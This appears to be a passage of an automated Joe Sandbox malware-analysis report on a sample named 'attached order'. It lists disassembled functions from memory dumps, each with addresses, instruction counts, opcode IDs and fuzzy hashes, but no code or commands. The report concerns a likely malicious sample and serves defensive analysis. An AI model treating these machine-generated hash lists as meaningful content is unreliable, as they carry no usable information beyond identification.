                                                                                          • Instruction Fuzzy Hash: CB313A71A04248AFCF14DFA9D844ADEBFF9EB48320F10806AE815E7310D775A954CFA4
                                                                                          Function 0BA74DB0 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 82c240beafaa3c3a28ea9a40eb6356f9ab8646b0723f8fe2054743a1bb9d1b9b
                                                                                          • Instruction ID: 17ee1dc589b5f18f5c7aafa6962e9cb55fbd500b7e54589382096caa63221b8a
                                                                                          • Opcode Fuzzy Hash: 82c240beafaa3c3a28ea9a40eb6356f9ab8646b0723f8fe2054743a1bb9d1b9b
                                                                                          • Instruction Fuzzy Hash: 40310774E082588FDB04DFAAC9406EEBBF6FF89300F14812AD419A7396DB345906CF50
                                                                                          Function 0BA74DC0 Relevance: .1, Instructions: 80COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 45b523f329d0c4254df9e07077497ea8d42319759abf88d4cfe379dad8944afc
                                                                                          • Instruction ID: ad8ad2d11f1bd06c507298bbfe570e693ed49f86072b67bb7b824cd5aa50dd19
                                                                                          • Opcode Fuzzy Hash: 45b523f329d0c4254df9e07077497ea8d42319759abf88d4cfe379dad8944afc
                                                                                          • Instruction Fuzzy Hash: DF31E474E08218DBDB08DFAAC9406EEBBF6FF89700F10812AD419A7399DB3459068B50
                                                                                          Function 0170D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16556828869.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_170d000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 101d88e143239db8a61cdefcecd384b2573a0face71aae3a94cc1bc7dd2ff203
                                                                                          • Instruction ID: c5fd6047cec933187658c2833f4ede1ed55041bb43334ac0ce7774d333015ae1
                                                                                          • Opcode Fuzzy Hash: 101d88e143239db8a61cdefcecd384b2573a0face71aae3a94cc1bc7dd2ff203
                                                                                          • Instruction Fuzzy Hash: 8A21F7B1504300EFDB16DF98D4C0B56FFA5EB88314F20C5A9ED090B286C336E456C6A2
                                                                                          Function 01A2D39C Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557008242.0000000001A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A2D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1a2d000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 77e8e0da111ce1898fd7ccc9fe934618ccec77f11fe470bf5517f2f8ef8fdec1
                                                                                          • Instruction ID: 790b61c337b3f3491126a2ffe392aa9d35ff4c80e034755814652c58379b431e
                                                                                          • Opcode Fuzzy Hash: 77e8e0da111ce1898fd7ccc9fe934618ccec77f11fe470bf5517f2f8ef8fdec1
                                                                                          • Instruction Fuzzy Hash: 1D2104B5504240EFDB05DF5CD4C4B16BFA5FB88314F24C96DE9094B287C33AE446CA62
                                                                                          Function 01A2D01C Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557008242.0000000001A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A2D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1a2d000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 76c896b5bcd3315b27594b4e70162dae7443224af0a29ee2c1ab2cc83494632c
                                                                                          • Instruction ID: d744d7772bfef0c2214aff81a6e10761ad3a07a6a0fe03b378abaf707598766b
                                                                                          • Opcode Fuzzy Hash: 76c896b5bcd3315b27594b4e70162dae7443224af0a29ee2c1ab2cc83494632c
                                                                                          • Instruction Fuzzy Hash: 7021F571508240EFDB15DF5CD4C0B16BF65EB88324F24C569D84A4B257C73AD446CA61
                                                                                          Function 0BA7A9A9 Relevance: .1, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9a114a4a5a1a3c53444116cb4743d496c509edf5ec7c288165c360af7455f095
                                                                                          • Instruction ID: ad947884bab30d19a2a03cba392d581724b4fdc627a17eecf1bb9c55ddd6b4a1
                                                                                          • Opcode Fuzzy Hash: 9a114a4a5a1a3c53444116cb4743d496c509edf5ec7c288165c360af7455f095
                                                                                          • Instruction Fuzzy Hash: 0C21F974E49209EFCB44DFA9C5819EEBBF5EF4A300F219099D459A7712D3309A42CF61
                                                                                          Function 0BA7A9B8 Relevance: .1, Instructions: 59COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: afa8c5c48fbf178c0a1e7b4669bf47d94b5b70824e00c27abcfc1294288f4569
                                                                                          • Instruction ID: 39c73dafaefef84e82452ae83346bf9ab98e6278dbb38c943299d248fd263851
                                                                                          • Opcode Fuzzy Hash: afa8c5c48fbf178c0a1e7b4669bf47d94b5b70824e00c27abcfc1294288f4569
                                                                                          • Instruction Fuzzy Hash: FB21F9B4E49209EFCB40DFA9C6819AEBBF5EB49300F209099D819A7711D3309E41CF61
                                                                                          Function 0BA70B54 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ae53cd2c6dfe9a4387d285f5c6726fbf39f7383785e017935d6c84bc3d158a16
                                                                                          • Instruction ID: 4c652ef4171084a546aaa1bf2845817ddc152ebc95fdc46a5b680bdce051c3e3
                                                                                          • Opcode Fuzzy Hash: ae53cd2c6dfe9a4387d285f5c6726fbf39f7383785e017935d6c84bc3d158a16
                                                                                          • Instruction Fuzzy Hash: DA21D3B59047499FCB10DF9AD984ADEBBF4FB48320F14842AE919B7300C375A954CFA5
                                                                                          Function 0BA7AA61 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a2bbca363d182a3af72b6eb4d984fdd9213f47d41259e10859c0b5101d682690
                                                                                          • Instruction ID: 46a797b08dd4b1905bf3d439f7f405c28eac7f9b9df3985e1491599758fb1db9
                                                                                          • Opcode Fuzzy Hash: a2bbca363d182a3af72b6eb4d984fdd9213f47d41259e10859c0b5101d682690
                                                                                          • Instruction Fuzzy Hash: 3B11E674D4C209FFCB05EFA9CA809ADBBF5EF49310F159595C458AB216D330AA05CB81
                                                                                          Function 0BA775A7 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8cad9d1589c8937fd1bd47bb93a880f18167efd10ec22c5143f070e6a6f7aab1
                                                                                          • Instruction ID: ff9e52dc3445804ebb38032d4fa768065b6ac12a17c47aa2022c8be4688882d1
                                                                                          • Opcode Fuzzy Hash: 8cad9d1589c8937fd1bd47bb93a880f18167efd10ec22c5143f070e6a6f7aab1
                                                                                          • Instruction Fuzzy Hash: FA11707098E388AFDB01DFA89910AADBFB4EF46200F1485EEC859DB293D6354A05DF51
                                                                                          Function 0170D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16556828869.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_170d000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2274c7db1a547e77de2208d4118985c427d4281ac850956550379ca3ed21dc67
                                                                                          • Instruction ID: 46336cb9f6347761984911028463691f6376d04b33efd16a47e098f64cf052b5
                                                                                          • Opcode Fuzzy Hash: 2274c7db1a547e77de2208d4118985c427d4281ac850956550379ca3ed21dc67
                                                                                          • Instruction Fuzzy Hash: BE119076504340DFDB16CF98D5C4B56FFB2FB84224F2486A9EC090A656C33AD45ACB91
                                                                                          Function 01A2D017 Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557008242.0000000001A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A2D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1a2d000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9c12914c266174283de5688687d2a34a1d0658c9b4365976b53567679ad1aa24
                                                                                          • Instruction ID: 4ac2accddde958d99eb339736c666330546d3ff17b228aff379c6b0a5b120763
                                                                                          • Opcode Fuzzy Hash: 9c12914c266174283de5688687d2a34a1d0658c9b4365976b53567679ad1aa24
                                                                                          • Instruction Fuzzy Hash: 14118E75508280DFDB16CF58D5C4B15BBB2FB44324F24C6AAD84A4B667C33AD44ACB62
                                                                                          Function 01A2D397 Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557008242.0000000001A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A2D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1a2d000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9c12914c266174283de5688687d2a34a1d0658c9b4365976b53567679ad1aa24
                                                                                          • Instruction ID: 2a12784d77ac037cfc51f49b7518a39a689fc6fdd1252a6ab42b7f7fac601036
                                                                                          • Opcode Fuzzy Hash: 9c12914c266174283de5688687d2a34a1d0658c9b4365976b53567679ad1aa24
                                                                                          • Instruction Fuzzy Hash: BC118BB5504280DFDB06CF58D5C4B55BFB2FB84214F24C6AAD8494B657C33AE44ACBA2
                                                                                          Function 0BA70ADD Relevance: .1, Instructions: 51COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 347482ff105e825338eef9c638106dc6cb7bed4f4ca033458e3571d3b0a0422b
                                                                                          • Instruction ID: 81fe1834b7d9d6b184256df7e4017eb69226efad13aed2f985d5f63cc1585a41
                                                                                          • Opcode Fuzzy Hash: 347482ff105e825338eef9c638106dc6cb7bed4f4ca033458e3571d3b0a0422b
                                                                                          • Instruction Fuzzy Hash: FE01DD2258F3D21ED713636C5CB99C67FB49E6312430E04E7D8C48F0A3D618086AC367
                                                                                          Function 0BA74E23 Relevance: .0, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 66fb682886f8ae83387fcbd3d439fd3b5fee28e716689d97e2123c9797b7f797
                                                                                          • Instruction ID: ad616655bd2a6fca43b528e10eb68d150534283d339245db349c3f3b0d19c350
                                                                                          • Opcode Fuzzy Hash: 66fb682886f8ae83387fcbd3d439fd3b5fee28e716689d97e2123c9797b7f797
                                                                                          • Instruction Fuzzy Hash: A811F378E08258CFCB45DFA8D8949EDBBF6FB89300F10816AD809A734ADB345905CF50
                                                                                          Function 0BA79AF2 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7875936299a2ef1d06723330d740005916f17da13e32715804401199c841b588
                                                                                          • Instruction ID: a58927b15d8578b2415ba7e35b5746197605836231d39c6529cc02a6e2621144
                                                                                          • Opcode Fuzzy Hash: 7875936299a2ef1d06723330d740005916f17da13e32715804401199c841b588
                                                                                          • Instruction Fuzzy Hash: 9B113770949208EFDB10DFA4C981A9EFBF6FF49300F1481A6C40AAB206C330D981CF10
                                                                                          Function 0BA75B78 Relevance: .0, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 25d780f89deeae5bb11aa7212175428f62ce4b57fd5e562979f6280eba15359e
                                                                                          • Instruction ID: 1b506ae42062b7a18a8dc687cf2ad76a80daf218565ee60896154d644c1e056c
                                                                                          • Opcode Fuzzy Hash: 25d780f89deeae5bb11aa7212175428f62ce4b57fd5e562979f6280eba15359e
                                                                                          • Instruction Fuzzy Hash: F1019E74D4D248EFCB00EFA8D8006BEBBB5EF99700F1084AA9418D7386E7744902CF51
                                                                                          Function 0BA74D51 Relevance: .0, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 16ba6541527bcaafed4724802bccb839f5e7b8cc272f1d82e97e56e5e7d482d7
                                                                                          • Instruction ID: bbdad9f6d66e5b4206337b5c1a71513aaba3cb0e8651a25028062a0491492c45
                                                                                          • Opcode Fuzzy Hash: 16ba6541527bcaafed4724802bccb839f5e7b8cc272f1d82e97e56e5e7d482d7
                                                                                          • Instruction Fuzzy Hash: F4014B34A8D248EFDF01EFA4DD019ADBBB8EB4A600F1050E6889893392EB345A158B41
                                                                                          Function 0BA7BD08 Relevance: .0, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7aec7d4a3f700a3745dc623e4bec05bd59f56a14d0a0d055921c1679d12af11b
                                                                                          • Instruction ID: bd0fcaa1f989012aacd1b7c89ccdb19a5da627ed86d699f5b14297b7ec2f548b
                                                                                          • Opcode Fuzzy Hash: 7aec7d4a3f700a3745dc623e4bec05bd59f56a14d0a0d055921c1679d12af11b
                                                                                          • Instruction Fuzzy Hash: 7201B1B098D384EFCB01DF65C820EA8BFB8AF4A700F9895A5C0445B257D7308A05CB61
                                                                                          Function 0BA72FC6 Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 29f714ddefc809b96b38adb48ed06f4a165821b24a29db6c8ff61339f17ab8ba
                                                                                          • Instruction ID: cd70c0715e680a7f73e158894eb282ea2480613091009cdd74fdf0e01f6e64f7
                                                                                          • Opcode Fuzzy Hash: 29f714ddefc809b96b38adb48ed06f4a165821b24a29db6c8ff61339f17ab8ba
                                                                                          • Instruction Fuzzy Hash: 4F0104A194E3C49FDB139B705C202987FB09F13109F1A49DBC1C5CB1A3D6690A49D722
                                                                                          Function 0BA71E68 Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 272c9eda5fad916c632d3665fa4672fee9d4aea7d6900f0a5cfe1f556944942a
                                                                                          • Instruction ID: dcb6761d78793621e6b7d16e60c913fb137c1d58db6df59d7ee2281b93716b0e
                                                                                          • Opcode Fuzzy Hash: 272c9eda5fad916c632d3665fa4672fee9d4aea7d6900f0a5cfe1f556944942a
                                                                                          • Instruction Fuzzy Hash: 7C018635704295AFDB469FA59C048AE7FF5FF89210710406AFC09C7361DB714D22DB91
                                                                                          Function 0BA7BD8B Relevance: .0, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 276e957ba40b8dc56bda74d15b390d42be4b4171faba71347c107b1c57b70bce
                                                                                          • Instruction ID: 60c605285d54a7c2723474345f24f1ab107561e4eb4a1242806b1c799a9135f5
                                                                                          • Opcode Fuzzy Hash: 276e957ba40b8dc56bda74d15b390d42be4b4171faba71347c107b1c57b70bce
                                                                                          • Instruction Fuzzy Hash: DA011A74A48108EFCB04EFA8C959EADBBF5EF89710F69C094D40997316C7319E10DB10
                                                                                          Function 0BA75B88 Relevance: .0, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9518844862582e9817122e4d734fcc36a49bef5299b271d3fc80f128046455bc
                                                                                          • Instruction ID: c0854c3afd4649863fb5f00f47f83bd821509d1e9454a796065531a8a78eb7f3
                                                                                          • Opcode Fuzzy Hash: 9518844862582e9817122e4d734fcc36a49bef5299b271d3fc80f128046455bc
                                                                                          • Instruction Fuzzy Hash: 6A016D74D49208EFCB40EFA8D9006BEB7F9FB99700F1085AA9429A7345FB705901CF51
                                                                                          Function 0BA7BD18 Relevance: .0, Instructions: 39COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ff0a9be20966a0a47ca57a5f43037805ed39ca57601226d023ea5fe49a67180a
                                                                                          • Instruction ID: bfb42d4e85eac867e78ddb28347d476ca0688f732a18a6deb2db5a520c4d6e0c
                                                                                          • Opcode Fuzzy Hash: ff0a9be20966a0a47ca57a5f43037805ed39ca57601226d023ea5fe49a67180a
                                                                                          • Instruction Fuzzy Hash: 5FF08CB098D208EBCF04EF65C860EACBBFCAB49B44F9495A4C4085B257D7308A01DB60
                                                                                          Function 0BA76F78 Relevance: .0, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 18709ddaf2967e7575bd34e34cd3dba6205770ab9a63ccb2e0c910d62147689c
                                                                                          • Instruction ID: 6b62031a68b6d516636fdee5f1e3b2765fdbec1e782d2efaf15cc29747afe342
                                                                                          • Opcode Fuzzy Hash: 18709ddaf2967e7575bd34e34cd3dba6205770ab9a63ccb2e0c910d62147689c
                                                                                          • Instruction Fuzzy Hash: FDF01974D4D6489FDF04EF68CD506ADBBB4EB4A300B10959A942893246D334090A8F80
                                                                                          Function 0BA7574F Relevance: .0, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: db6883974bc2180370d7220cf6709fc152ec79adc8e0d6d3e0d18f3fe00be2af
                                                                                          • Instruction ID: 951ec98e4c7bc4237c8627e33df1ffede5aee126888411106d28dbf35c880fac
                                                                                          • Opcode Fuzzy Hash: db6883974bc2180370d7220cf6709fc152ec79adc8e0d6d3e0d18f3fe00be2af
                                                                                          • Instruction Fuzzy Hash: C4F01974D8D248EFCF15EFA89D406ADBFB4EB5A310F14499A882997252D77016058F40
                                                                                          Function 0BA751C9 Relevance: .0, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 97fe0391a79439967885e6b46d3239fab3d976ae431cc55fc84702d704531b36
                                                                                          • Instruction ID: ca5c873b540cbb8b84cd0f643ea53ad79330202cf5629664cfb4e299d39517b8
                                                                                          • Opcode Fuzzy Hash: 97fe0391a79439967885e6b46d3239fab3d976ae431cc55fc84702d704531b36
                                                                                          • Instruction Fuzzy Hash: 1FF04F30E99288DFCB05EFA8D9549ACBFB0EF86221F1481DAD8089B393C7319955CF41
                                                                                          Function 0BA77658 Relevance: .0, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dcd640600dfdc4b48701bddee1ef508a80d07840c221dd5c0bf787db81825ff3
                                                                                          • Instruction ID: 743bbefd6e8447369fffe251e9626ba4a8c6c03a94f8af7626635805c533f770
                                                                                          • Opcode Fuzzy Hash: dcd640600dfdc4b48701bddee1ef508a80d07840c221dd5c0bf787db81825ff3
                                                                                          • Instruction Fuzzy Hash: C1F0F474E8D348AFCF01EFA998406ADBFB4EB4A610F1491EEC459A3256E3354A44CF81
                                                                                          Function 0BA775F8 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 032a0ed67c08c6fc14ca04b96e934157e9bdadbc348830f7560f1325055367e4
                                                                                          • Instruction ID: a46277e65f76fd7c820d532a018ea02582086ac39ea74ee3fa45be1ae9780f8d
                                                                                          • Opcode Fuzzy Hash: 032a0ed67c08c6fc14ca04b96e934157e9bdadbc348830f7560f1325055367e4
                                                                                          • Instruction Fuzzy Hash: A7F03070D4D208EFCF54EF6889415ACBFB4DB4A610F1495EA84199324AE7344D05CF41
                                                                                          Function 0BA77A04 Relevance: .0, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 254886eec689ca9737b657e43210ef6aba4c4a409a31cb80323ce80726174cd7
                                                                                          • Instruction ID: f55f4411c1cbcfdd25decd68e4ccef50a6bcfafa668ec0e834765a2816818595
                                                                                          • Opcode Fuzzy Hash: 254886eec689ca9737b657e43210ef6aba4c4a409a31cb80323ce80726174cd7
                                                                                          • Instruction Fuzzy Hash: A6F0C271D492489FCB40EFA8C8226ACBBB0EF59200F1480DAC888D7356E3348E02CF41
                                                                                          Function 0BA74B99 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
